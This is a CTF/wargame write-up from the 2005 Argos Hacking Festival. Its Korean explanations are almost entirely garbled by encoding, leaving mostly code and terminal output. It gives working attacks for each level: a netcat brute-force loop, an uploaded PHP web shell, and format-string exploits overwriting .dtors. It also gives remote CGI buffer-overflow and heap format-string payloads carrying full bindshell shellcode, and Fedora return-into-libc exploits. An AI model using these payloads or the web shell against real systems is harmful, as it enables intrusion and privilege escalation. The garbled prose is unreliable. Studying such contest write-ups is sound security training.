================================
/                              /
/ Argos Hacking Festival 2005  /
/                     (report) /
================================

[hkpco@ns hkpco]$ whoami
id        / hkpco(monami)
mail&msn  / hkpco@korea.com
homepage  / http://hkpco.kr/
name      / Park Chan Am


| menu |
---------------------------------------------------
  1.  level1   - Brute Force                      |
  2.  level2   - File Upload                      |
  3.  level3   - Debugging                        |
  4.  level4   - Windows Crack                    |
  5.  level5   - Using a Method                   |
  6.  level6   - $-flag Format_String_Bug         |
  7.  level7   - Remote cgi Buffer_Over_Flow      |
  8.  level8   - Remote cgi Format_String_Bug     |
  9.  level9   - Fedora Buffer_Over_Flow          |
  10. level10  - Fedora Format_String_Bug         |
  11. level11  - Rule_find(Sense)                 |
  12. PostScript                                  |
---------------------------------------------------



!!!!!!!!!!!!!!!!!! 1. level1 - Brute Force !!!!!!!!!!!!!!!!!!

/*
	# LEVEL1 #
	 pi ѼҼ  Դϴ.
	 pi Ҽ Ʒ 10000° 10002°  ڸ  ʷ Էϼ.
*/

level1  Brute Force ϴ.
ڸ  001,002,003 Ͱ   ִٴ  Ͽ %03d ̿Ͽϴ.

- bruteforce.c -

int main( void )
{
	int i;
	char cmd[1024];
	for( i=0 ; i<1000 ; i++ )
	{
		sprintf( cmd , "(printf \"GET http://168.188.130.231/level1.php?number=%03d HTTP/1.0\\n\\n\")|nc 168.188.130.231 80" , i );
		system( cmd );
	}
}




[hkpco@localhost ahf]$ cat > bruteforce.c
int main( void )
{
        int i;
        char cmd[1024];
        for( i=0 ; i<1000 ; i++ )
        {
                sprintf( cmd , "(printf \"GET http://168.188.130.231/level1.php?number=%03d HTTP/1.0\\n\\n\")|nc 168.188.130.231 80" , i );
                system( cmd );
        }
}
[hkpco@localhost ahf]$ gcc -o bruteforce bruteforce.c
[hkpco@localhost ahf]$ ./bruteforce > result
[hkpco@localhost ahf]$ cat result | grep "pass"
<font color=blue><b>մϴ. <br><br> level1 password is 'pi=3.141592'<br> ϼ</b></font><br><br><font color=red><b># LEVEL1 #</b></font><br>
[hkpco@localhost ahf]$ 





!!!!!!!!!!!!!!!!!! level2 - File Upload !!!!!!!!!!!!!!!!!!

/*
	# LEVEL2 #
	 ø
*/

level2  File Upload Դϴ.
php Ȯڴ ε带  ϰ سҽϴ.
.ph  ȸϿ ε մϴ.( *.ph Ȯڿܿ phP ,pHp  ȸ  ֽϴ.)

- hk.ph -

<?php
	system($cmd);
?>

(cmd  ) cat /usr/local/apache/htdocs/board/data/level2_vkdlfdjq/auth_vkdlfdjqfhem.txt

մϴ.

Level2 password is "SoBored!"

 ϼ.





!!!!!!!!!!!!!!!!!! level3 - Debugging !!!!!!!!!!!!!!!!!!

/*
	# LEVEL3 #
	168.188.130.231 guest (ȣ : AHF2005guest) (SSH)Ͻø,
	level3  ֽϴ^^ հǪ~
*/

level3 debugging Դϴ.
ٸ user uid 0x1f9(505)  getuid() ϰ %eax ͸ մϴ.
gdb Ͽ   ϸ ˴ϴ.

[guest@localhost guest]$ gdb -q level3
(gdb) disassemble main
Dump of assembler code for function main:
0x080483b2 <main+0>:    push   %ebp
0x080483b3 <main+1>:    mov    %esp,%ebp
0x080483b5 <main+3>:    sub    $0x8,%esp
0x080483b8 <main+6>:    and    $0xfffffff0,%esp
0x080483bb <main+9>:    mov    $0x0,%eax
0x080483c0 <main+14>:   sub    %eax,%esp
0x080483c2 <main+16>:   movl   $0x0,0xfffffffc(%ebp)
0x080483c9 <main+23>:   movl   $0x0,0xfffffffc(%ebp)
0x080483d0 <main+30>:   cmpl   $0x63,0xfffffffc(%ebp)
0x080483d4 <main+34>:   jle    0x80483d8 <main+38>
0x080483d6 <main+36>:   jmp    0x80483e9 <main+55>
0x080483d8 <main+38>:   lea    0xfffffffc(%ebp),%eax
0x080483db <main+41>:   incl   (%eax)
0x080483dd <main+43>:   lea    0xfffffffc(%ebp),%eax
0x080483e0 <main+46>:   incl   (%eax)
0x080483e2 <main+48>:   lea    0xfffffffc(%ebp),%eax
0x080483e5 <main+51>:   incl   (%eax)
0x080483e7 <main+53>:   jmp    0x80483d0 <main+30>
0x080483e9 <main+55>:   call   0x804829c <getuid>
//////////   0x080483ee <main+60>:   cmp    $0x1f9,%eax    ////////// point!
0x080483f3 <main+65>:   jne    0x804840c <main+90>
0x080483f5 <main+67>:   sub    $0xc,%esp
0x080483f8 <main+70>:   push   $0x8048516
0x080483fd <main+75>:   call   0x804828c <printf>
0x08048402 <main+80>:   add    $0x10,%esp
0x08048405 <main+83>:   call   0x804835c <foo>
0x0804840a <main+88>:   jmp    0x804841c <main+106>
0x0804840c <main+90>:   sub    $0xc,%esp
0x0804840f <main+93>:   push   $0x8048520
0x08048414 <main+98>:   call   0x804828c <printf>
0x08048419 <main+103>:  add    $0x10,%esp
0x0804841c <main+106>:  mov    $0x0,%eax
0x08048421 <main+111>:  leave
0x08048422 <main+112>:  ret
0x08048423 <main+113>:  nop
End of assembler dump.
(gdb) b *0x080483e9
Breakpoint 1 at 0x80483e9
(gdb) b *0x080483ee
Breakpoint 2 at 0x80483ee
(gdb) r
Starting program: /home/guest/level3

Breakpoint 1, 0x080483e9 in main ()
(gdb) info reg eax
eax            0xbffffb04       -1073743100
(gdb) c
Continuing.

Breakpoint 2, 0x080483ee in main ()
(gdb) info reg eax
eax            0x1f6    502
(gdb) set $eax=505
(gdb) info reg eax
eax            0x1f9    505
(gdb) c
Continuing.
Great!!
level3 password : 999379


  Ǫ  ptrace ̿ϴ Դϴ.
indra ڵ带 Ͽϴ.

http://hkpco.joinc.co.kr/ahf/ptrace.c

[guest@localhost guest]$ gcc -o ptrace ptrace.c -DAHF
[guest@localhost guest]$ ./ptrace
UserName: level3
Great!!
level3 password : 999379





!!!!!!!!!!!!!!!!!! level4 - Windows Crack !!!!!!!!!!!!!!!!!!

/*
	# LEVEL4 # 
	 α׷ ִ ø(Serial) ȣ ã!! ^^

	α׷ ٿޱ : level4.exe 
*/

Crack Դϴ.
ollydbg Ͽ Ǯ  ֽϴ.
׸ Ÿ     ˾ƺڽϴ.

1. level4.exe Open

2. Search for -> All referenced text strings -> ASCII "Debugger is detected! program terminated!" (double click)

3.  ϴ° ȣϰ ֱ  ׺κ ȸϿ մϴ.
   JE SHORT level4.0040190F κ JMP level4.0040190F  ٲݴϴ.

4. Debug -> Run

5.  α׷   Է  Ȯ.

6. ߰  ٸ â ø sTACK ss:[0012f748]=0116740E , EAX=ƹ 
   ٷ sTACK ss:[0012f748]=0116740E  κп serial  ֽϴ.
   0116740E  ģ  α׷  Է.

7. 18248718Է ->
   Great!!
   Level 4 password is my password





!!!!!!!!!!!!!!!!!! Level5 - Using a Method !!!!!!!!!!!!!!!!!!

/*
	# LEVEL5 #
	Hint 1 : HTTP Body ʿ ʽϴ.
	Hint 2 : Ʒ  ȸ httpd.conf Դϴ.
*/

̹  httpd.conf Ͽ Ű Method ̿Ͽ Ǫ Դϴ.
httpd.conf 츮 ʿ ϴ κ ڽϴ.

-----------------------------------------------------
SetEnvIf Cookies "we are one" AHF2005

<Directory "/home/level5/public_html/secret_5/">
  Order deny,allow
  deny from all
  allow from env=AHF2005
</Directory>
-----------------------------------------------------

Cookies ȯ溯 we are one ̶   AHF2005 Ȱȭ Ѽ    ֽϴ.
Ʈ HTTP Body ʿ  ʴ´ٰ  Ϳ ؾ մϴ.
Body ƴϸ Head ɼ ϴ.
ϴ   ޼ҵ带 ڽϴ.

  OPTIONS_method û ,  ϵ ξ α׷  ڽϴ.
(http://hkpco.joinc.co.kr/socket/options_method.c)

[hkpco@ns socket]$ ./options_method ahf.argos.or.kr
------------------------
|  OPTIONS * HTTP/1.0  |
------------------------

request send result :

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2005 11:35:19 GMT
Server: Apache
Allow: GET,HEAD,POST,OPTIONS,TRACE
Content-Length: 0
Connection: close
Content-Type: text/plain


  Method Allow: GET,HEAD,POST,OPTIONS,TRACE Դϴ.
߿ HTTP Head  method HEAD û غ н尡 µ˴ϴ.

[hkpco@ns hkpco]$ telnet ahf.argos.or.kr 80
Trying 168.188.130.239...
Connected to ahf.argos.or.kr.
Escape character is '^]'.
HEAD /~level5/secret_5/ HTTP/1.0
Cookies: AHF2005=we are one

HTTP/1.1 200 OK
Date: Sun, 24 Jul 2005 04:34:11 GMT
Server: Apache
X-Powered-By: PHP/4.4.0
Password : cool guy passket!
Connection: close
Content-Type: text/html

Connection closed by foreign host.





!!!!!!!!!!!!!!!!!! level6 - $-flag Format_String_Bug !!!!!!!!!!!!!!!!!!

/*
	# LEVEL6 #
	168.188.130.231 guest (ȣ : AHF2005guest) (SSH)Ͻø level6 ̶  ֽϴ.
	 ̳? ׷ ٽ AHF ..
*/

̹  $-flag fsb Դϴ.
level3 Ǯ Ͽٰ 󶳰ῡ level3  ˰ level6 Ǯ ҽϴ;; ;;
level6  r    ϴ.
 x ־  ̿Ͽ  copy   ҽϴ.

[guest@localhost guest]$ cp level6 a
[guest@localhost guest]$ ls
a  level3  level6  public_html
[guest@localhost guest]$ cat a
6  Ǯ ̾? :)
 /home/level6/level6 ̰  ֽϴ.
̵ Ź帳ϴ!! - binish of AHF2005 -
[level6@localhost level6]$ ls
level6  password

 Ǯ ڽϴ.

[guest@localhost level6]$ objdump -h level6 | grep ".dtors"
 18 .dtors        00000008  080494f4  080494f4  000004f4  2**2
[guest@localhost guest]$ ./egg
Using address: 0xbfffdef0

------------------
egg: 0xbfffdef0  |
.dtors: 080494f8 |
------------------

+ ϳ Ű padding  7° padding buffer    ־ϴ.
  ݿ ѹ   Դϴ.
paddingڸ       Ȥ,  Ű õմϴ.

[guest@localhost guest]$ /home/level6/level6 AAAA+++++++%96\$8x
AAAA+++++++41414141

* paddingڸ ϳ Ҷ ڿ  %96\$57049c κ 1   մϴ.

/home/level6/level6 `perl -e 'print "\x41\x41\x41\x41\xf8\x94\x04\x08\x41\x41\x41\x41\xfa\x94\x04\x08"'`+++++++%96\$57049c%97\$n%98\$57615c%99\$n


/home/level6/level6 `perl -e 'print "\x41\x41\x41\x41\xf8\x94\x04\x08\x41\x41\x41\x41\xfa\x94\x04\x08"'`++++++%96\$57050c%97\$n%98\$57615c%99\$n


/home/level6/level6 `perl -e 'print "\x41\x41\x41\x41\xf8\x94\x04\x08\x41\x41\x41\x41\xfa\x94\x04\x08"'`+++++%96\$57051c%97\$n%98\$57615c%99\$n


sh-2.05b$ /bin/bash
No value for $TERM and no -T specified
No value for $TERM and no -T specified
[level6@localhost guest]$ id
uid=504(level6) gid=504(guest) groups=502(guest)
[level6@localhost guest]$ cat password
cat: password: 㰡 źε

 ¿ password  ʽϴ.
newgrp ɾ   level6 gid ϴ.

[level6@localhost level6]$ newgrp
No value for $TERM and no -T specified
No value for $TERM and no -T specified
[level6@localhost level6]$ id
uid=504(level6) gid=504(level6) groups=502(guest)
[level6@localhost level6]$ cat password
մϴ.

level6 password is "MayTheForceBeWithYou!!"

 ϼ





!!!!!!!!!!!!!!!!!! level7 - Remote cgi Buffer_Over_Flow !!!!!!!!!!!!!!!!!!

/*
	# LEVEL7 # 
	LOGIN :: 
	ID 
	PASS 
*/

̹  remote cgi bofԴϴ. 
id pass Էϸ αο Ͽٴ  Բ dump  ݴϴ.
 ڵ

[NOP]
[bindshell]
[bindshell_addr]

̷ Ǿ ֽϴ. bindshell 30464port ݴϴ.
 ڽϴ.

(terminal1)
[hkpco@localhost bof]$ (perl -e 'print "POST /cgi-bin/level7.cgi HTTP/1.0\nHost: 168.188.130.231\nUser-Agent: HTTPTool/1.0\nContent-Length: 500\n\n","\x90"x16,"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff","\x90"x3,"\xd1\xfa\xff\xbf"x100';cat)|nc 168.188.130.231 80

(terminal2)
[hkpco@ns hkpco]$ telnet 168.188.130.231 30464
Trying 168.188.130.231...
Connected to 168.188.130.231.
Escape character is '^]'.
ls;
dumpcode.h
level7.cgi
level7_qjvjdhqjvmffh
: command not found
cd level7_qjvjdhqjvmffh;
: command not found
ls;
auth_dhqjvmffh.txt
: command not found
cat auth_dhqjvmffh.txt;
մϴ.

level 7 passwd is "ThereIsNoFork!";

 ϼ
: command not found





!!!!!!!!!!!!!!!!!! level8 - Remote cgi Format_String_Bug !!!!!!!!!!!!!!!!!!

/*
	LOGIN 
	ID 
	PASS 
*/


̰ ó remote_attack Դϴ.
Remote cgi Format_String_Bug in Heap Memory  ص ڱ~
passket `FSB in Heap Memory` о ̶  Ǯ  ְڽϴ.
ݳ뿡 о passket    Ǿ ϴ.
( о ޴;;)

passket  ޵Ǿ, printf ʹ 0xbf++++++ -> 0xc0++++++  Ƿ
Heap FSB ߻ϸ Դϴ.
, α׷  stack   ִٸ ̾߱ ޶ϴ.
ڵ  ڽϴ.


(ij brute_forceϴ )

AAAA[brute1][\x04\x08]CCCC[brute2][\x04\x08]  <- j+2 , i	//16byte

[dummy]		//240byte
----------buf1 , buf2----------
[%08x]x7	//56byte

[%1996c%hn%39068c%hn]  <- j , i		//2byte

[NOP]x100	//100byte

[bind_code]	//177byte


.dtors brute_force Ͽ  ڵϿϴ.
α׷    bindshell  port(30464) ϸ ˴ϴ.


- remote_attack.c -

#include <stdio.h>

int main( void )
{
        int i, j;
        char cmd[2048];

        for(i=0x99;i<0xa0;i++)
                for(j=0x01;j<0xff;j++)
		{
			sprintf( cmd , "printf \"\\n\"|(perl -e 'print \"POST /cgi-bin/level8.cgi HTTP/1.0\\n\",\"Host: 168.188.130.232\\n\",\"Content-Length: 613\\n\\n\",\"AAAA\\x%02x\\x%02x\\x04\\x08CCCC\\x%02x\\x%02x\\x04\\x08\", \"A\"x240,\"%%08x\"x7, \"%%1996c%%hn%%39068c%%hn\" , \"\\x90\"x100,\"\\x31\\xc0\\xb0\\x02\\xcd\\x80\\x85\\xc0\\x75\\x43\\xeb\\x43\\x5e\\x31\\xc0\\x31\\xdb\\x89\\xf1\\xb0\\x02\\x89\\x06\\xb0\\x01\\x89\\x46\\x04\\xb0\\x06\\x89\\x46\\x08\\xb0\\x66\\xb3\\x01\\xcd\\x80\\x89\\x06\\xb0\\x02\\x66\\x89\\x46\\x0c\\xb0\\x77\\x66\\x89\\x46\\x0e\\x8d\\x46\\x0c\\x89\\x46\\x04\\x31\\xc0\\x89\\x46\\x10\\xb0\\x10\\x89\\x46\\x08\\xb0\\x66\\xb3\\x02\\xcd\\x80\\xeb\\x04\\xeb\\x55\\xeb\\x5b\\xb0\\x01\\x89\\x46\\x04\\xb0\\x66\\xb3\\x04\\xcd\\x80\\x31\\xc0\\x89\\x46\\x04\\x89\\x46\\x08\\xb0\\x66\\xb3\\x05\\xcd\\x80\\x88\\xc3\\xb0\\x3f\\x31\\xc9\\xcd\\x80\\xb0\\x3f\\xb1\\x01\\xcd\\x80\\xb0\\x3f\\xb1\\x02\\xcd\\x80\\xb8\\x2f\\x62\\x69\\x6e\\x89\\x06\\xb8\\x2f\\x73\\x68\\x2f\\x89\\x46\\x04\\x31\\xc0\\x88\\x46\\x07\\x89\\x76\\x08\\x89\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xc0\\xb0\\x01\\x31\\xdb\\xcd\\x80\\xe8\\x5b\\xff\\xff\\xff\"';cat) | nc 168.188.130.232 80" , j+2 , i , j , i );
			system( cmd );
                }
        return 0;
}

(terminal1)
[hkpco@localhost fsb]$ gcc -o remote_attack remote_attack.c
[hkpco@localhost fsb]$ ./remote_attack >/dev/null

(terminal2)
[hkpco@ns hkpco]$ telnet 168.188.130.232 30464
Trying 168.188.130.232...
Connected to 168.188.130.232.
Escape character is '^]'.
ls;
dumpcode.h
level8.cgi
level8_glqdudduvhapt
: command not found
cd level8_glqdudduvhapt;
: command not found
ls;
auth_eggmelong.txt
: command not found
cat auth_eggmelong.txt;
մϴ.

level8 password is "AnotherWayToMyWay~"

 ϼ





!!!!!!!!!!!!!!!!!! level9 - Fedora Buffer_Over_Flow !!!!!!!!!!!!!!!!!!

/*
	# LEVEL9 # 
	168.188.130.233 guest (ȣ : guest_ahf2005) α(SSH)Ͻø,
	level9  ֽϴ. ϴ!
*/

level9 ⺻ Fedora BOF Դϴ.
Fedora BOF  ڼ   ʰڽϴ.
׷    ڽϴ.

[guest@localhost guest]$ cat /etc/*release
Fedora Core release 2 (Tettnang)
Fedora Core release 2 (Tettnang)
// Fedora Ȯ

[guest@localhost .hk]$ gdb -q /home/guest/level9
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) b main
Breakpoint 1 at 0x80485e0
(gdb) r
Starting program: /home/guest/level9
Error while mapping shared library sections:
: Success.
Error while reading shared library symbols:
: No such file or directory.
(no debugging symbols found)...(no debugging symbols found)...Error while reading shared library symbols:
: No such file or directory.
Error while reading shared library symbols:
: No such file or directory.

Breakpoint 1, 0x080485e0 in main ()
(gdb) disassemble execl
Dump of assembler code for function execl:
0x00197a00 <execl+0>:   push   %ebp
0x00197a01 <execl+1>:   mov    %esp,%ebp
[ 0x00197a03 <execl+3>:   lea    0x10(%ebp),%eax ] // the point!
.
.
.
---Type <return> to continue, or q <return> to quit---q
Quit


[guest@localhost .hk]$ gdb -q /home/guest/level9
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) b main
Breakpoint 1 at 0x80485e0
(gdb) r
Starting program: /home/guest/level9
Error while mapping shared library sections:
: Success.
Error while reading shared library symbols:
: No such file or directory.
(no debugging symbols found)...(no debugging symbols found)...Error while reading shared library symbols:
: No such file or directory.
Error while reading shared library symbols:
: No such file or directory.

Breakpoint 1, 0x080485e0 in main ()
(gdb) x/50x 0x8049000
0x8049000:      0x464c457f      0x00010101      0x00000000      0x00000000
0x8049010:      0x00030002      0x00000001      0x080482c0      0x00000034
0x8049020:      0x00000788      0x00000000      0x00200034      0x00280007
0x8049030:      0x0019001c      0x00000006      0x00000034      0x08048034
0x8049040:      0x08048034      0x000000e0      0x000000e0      0x00000005
0x8049050:      0x00000004      0x00000003      0x00000114      0x08048114
0x8049060:      0x08048114      0x00000013      0x00000013      0x00000004
0x8049070:      0x00000001      0x00000001      0x00000000      0x08048000
0x8049080:      0x08048000      0x0000047c      0x0000047c      0x00000005
0x8049090:      0x00001000      0x00000001      0x0000047c      0x0804947c
0x80490a0:      0x0804947c      0x00000100      0x00000104      0x00000006
0x80490b0:      0x00001000      0x00000002      0x00000490      0x08049490
0x80490c0:      0x08049490      0x000000c8
(gdb)
.
.
.
0x8049560 <_GLOBAL_OFFSET_TABLE_+4>:    0x0095f4d0      0x00954830      0x009769f0      0x080482b6
(gdb) x/8x 0x8049564
0x8049564 <_GLOBAL_OFFSET_TABLE_+8>:    0x00954830   [   0x009769f0      0x080482b6      0x00000000   ] // the point!
0x8049574 <__dso_handle>:       0x00000000      0x08049488      0x00000000      0x00000000

(gdb) x/8x 0x009769f0
0x9769f0 <__libc_start_main>:   [0x57e58955      0xec835356      0x0c458b4c      0xe810558b] // the point!
0x976a00 <__libc_start_main+16>:        [0xffffff09      0x25f8c381]      0x7d8b00[10]      0x1c758b18 // the point!

[guest@localhost .hk]$ cat > sh.c
int main( void )
{
        setreuid(geteuid(),geteuid());
        setregid(getegid(),getegid());
        execl("/bin/sh", "sh", 0);
}
[guest@localhost .hk]$ gcc -o sh sh.c
[guest@localhost .hk]$ ln -s ./sh "`perl -e 'print "\x55\x89\xe5\x57\x56\x53\x83\xec\x4c\x8b\x45\x0c\x8b\x55\x10\xe8\x09\xff\xff\xff\x81\xc3\xf8\x25\x10"'`"
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
        LANGUAGE = (unset),
        LC_ALL = (unset),
        LANG = "euc_KR"
    are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").
[guest@localhost .hk]$ ls
U??WVS??L?E??U?????????%?  sh  sh.c

[guest@localhost .hk]$ gdb -q /home/guest/level9_vul
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) disassemble main
Dump of assembler code for function main:
0x08048370 <main+0>:    push   %ebp
0x08048371 <main+1>:    mov    %esp,%ebp
0x08048373 <main+3>:    sub    $0x108,%esp  <- 0x108==264
.
.
.
(gdb) quit

  źδ Ʒ ϴ.
| dummy(264byte) | execl ù argument -8 | (execl+3)_addr |

,     ڽϴ.


[guest@localhost .hk]$ /home/guest/level9_vul "`perl -e 'print "A"x264,"\x60\x95\x04\x08","\x03\x7a\x19"'`"
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
        LANGUAGE = (unset),
        LC_ALL = (unset),
        LANG = "euc_KR"
    are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").
sh-2.05b$ id
uid=504(guest) gid=501(level9) groups=504(guest)
sh-2.05b$ cat /home/guest/level9_password
մϴ.

Level9 password id "FeDoRaCoRe2 was broken!"

 ϼ





!!!!!!!!!!!!!!!!!! level10 - Fedora Format_String_Bug !!!!!!!!!!!!!!!!!!

/*
	# LEVEL10 # 
	168.188.130.233 guest2 (ȣ : guest2_ahf2005) α(SSH)Ͻø,
	level10  ֽϴ.   ϴ!!
*/

level10... Ͻ  е  Ͻ ΰ ϴ.
 Fedora FSB ؼ   °ɷ ˰ ֽϴ.
ݿ  óý  ˾ƺڽϴ.

1/ .dtors 
2/ exec*Լ library .dtors 
3/ ּҿ   1 ϵ ڵ

׷  exploit ڽϴ.

- brute_ffsb.c -

#include <stdio.h>
#include <string.h>

int main( void )
{
	int i=34562;
	char cmd[1024];

	while(1)
	{
		sprintf(cmd,"strace /home/guest2/level10_vul `perl -e 'print \"AAAA\\xa6\\x94\\x04\\x08CCCC\\xa4\\x94\\x04\\x08\",\"%%08x\"x7,\"%%86c%%hn%%%dc%%hn\",\"BB\"'`",i);
		system( cmd );
		printf ("%s",cmd);
		
		i++;
		getchar();
	}
}


execve system_callȮ Ͽ strace Ͽϴ.
brute_ffsb Ͽ execve ϴ  ΰ ϰ, -1 (شο  )ϴ° ̿Ͽ
   ֽϴ.
θ ũ Ű   α׷ ̿ϰڽϴ.

- link.c -

int main( void )
{ 
	symlink( "./shell" , "\xA1\x64\x96\x04\x08\x8B\x10\x85\xD2\x75\xEB\xC6\x05\x68\x96\x04\x08\x01\xC9\xC3\x89\xF6\x55\x89\xE5\x83\xEC\x08\xA1\x70\x95\x04\x08\x85\xC0\x74\x19\xB8" );
}


[guest2@localhost .test]$ ../level10_vul `perl -e 'print "AAAA\x6e\x95\x04\x08CCCC\x6c\x95\x04\x08","%08x"x7,"%86c%hn%34794c%hn"'`
.
.
.
                                $ id
uid=505(guest2) gid=505(guest2) egid=502(level10) groups=505(guest2)
$ cat /home/guest2/level10_password
Wow..

level10 password is "is It possible st1ll?"





!!!!!!!!!!!!!!!!!! level11 - Rule_find(Sense) !!!!!!!!!!!!!!!!!!

/*
	# LEVEL11 # 
	HINT : 168.188.130.232 7979 Ʈ ֽϴ.
	Ǫµ   Ȥ ù (?) Ⱚ ٽϴ.
	ϼŵ ˴ϴ^^; ˼ۿ~ Ф
	׷..   մϴ!
*/

̹  /ڿ Էϸ Ư Ģ /ڿ ȯǾ µ˴ϴ.
 Ģ ãƼ AHF2005     ֵ ϸ  Դϴ.
 Ʈ α׷ Էµ  ASCII_number-7 Ͽ   ݴϴ.
̴  ڵ AHF2005 ִ ڿ ã  ֽϴ.

- rule.c -

int main( void )
{
        printf( "%c%c%c%c%c%c%c\n" ,'A'+7,'H'+7,'F'+7,'2'+7,'0'+7,'0'+7,'5'+7 );
}


[hkpco@ns ahf]$ gcc -o rule rule.c
[hkpco@ns ahf]$ ./rule
HOM977<

׷  HOM977<  Է  ϰڽϴ.

[hkpco@ns ahf]$ telnet 168.188.130.232 7979
Trying 168.188.130.232...
Connected to 168.188.130.232.
Escape character is '^]'.
HOM977<
# Password was sent to you! :-)
Connection closed by foreign host.

н带  ־ٰ մϴ.
Ư Ʈ  شٴ     ֽϴ.
 Ʈ ִ   ƴ,  Ѵ Sense Ǯ ڽϴ.
AHF2005 Ƽ Ʈ 2005     ֽϴ.
׷  nc 2005port  ѳ   ִ н带  ˴ϴ.

* sense  е sniffer ̿ϸ ˴ϴ.

(terminal1)
[hkpco@localhost ~]$ telnet 168.188.130.232 7979
Trying 168.188.130.232...
Connected to 168.188.130.232 (168.188.130.232).
Escape character is '^]'.
HOM977<
# Password was sent to you! :-)
Connection closed by foreign host.

(terminal2)
[hkpco@localhost ~]$ nc -l -v -p 2005
listening on [any] 2005 ...
168.188.130.232: inverse host lookup failed: Unknown host
connect to [222.122.45.36] from (UNKNOWN) [168.188.130.232] 39052
# Level11 Password is 'DoYouHaveAGirlFriend?'





-+-+-+-+-+-+-+-+-+-+ PostScript(ı) -+-+-+-+-+-+-+-+-+-+

48ð ٸ , ªٸ ª ȸ    ϴ.
Ư Argos ȸ ٸ ȸó ܽ Ǯ̰ ƴ϶  ҽϴ.
и   ˾Ҵε  Ǯ ϴ   ʾҰ,
׷   ȸ  ִ  ȸ Ǿϴ.
 Ǯ鼭 ġ ġϴ  ִ ȸϴ.

׸  ð  ͸ Ͻô е  ϼ̽ϴ.
پ  ִ  Ӹ İϴ.
̾   оּż 帮, ı⸦   Ĩϴ.
    մϴ!
Argos !!
